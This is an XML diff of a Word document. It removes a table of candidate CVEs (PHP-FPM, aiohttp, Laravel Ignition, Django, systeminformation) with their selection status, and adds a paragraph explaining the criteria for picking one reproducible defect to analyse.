-              <w:t>rejected — already used</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2019-11043</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>PHP-FPM</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>yes</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>rejected — already used</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2024-23334</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>aiohttp</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>yes</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>rejected — already used</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2021-3129</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Laravel Ignition</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>no</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>valid, but the payload chain is heavy for a first CVE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2019-14234</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Django</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>no</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>valid, but needs a PostgreSQL container to demonstrate</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:cantSplit w:val="true"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2154"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>CVE-2021-21315</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2381"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>systeminformation (npm)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1474"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>no</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3288"/>
-          </w:tcPr>
-          <w:p>
-            <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>**assigned and analysed** — one parameter, objective fix, no exotic setup</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="40"/>
-      </w:pPr>
+      <w:r>
+        <w:t>Three properties made the analysis practical rather than theoretical: the defect is in a component that web applications really install (so the exploit is realistic, not synthetic); it needs one parameter and one request (so it is reproducible in a few commands); and it was fixed in a documented commit (so the fix can be verified objectively instead of asserted). The criterion applied throughout was therefore “a real, reproducible defect with a checkable fix”.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>

</xml_diff>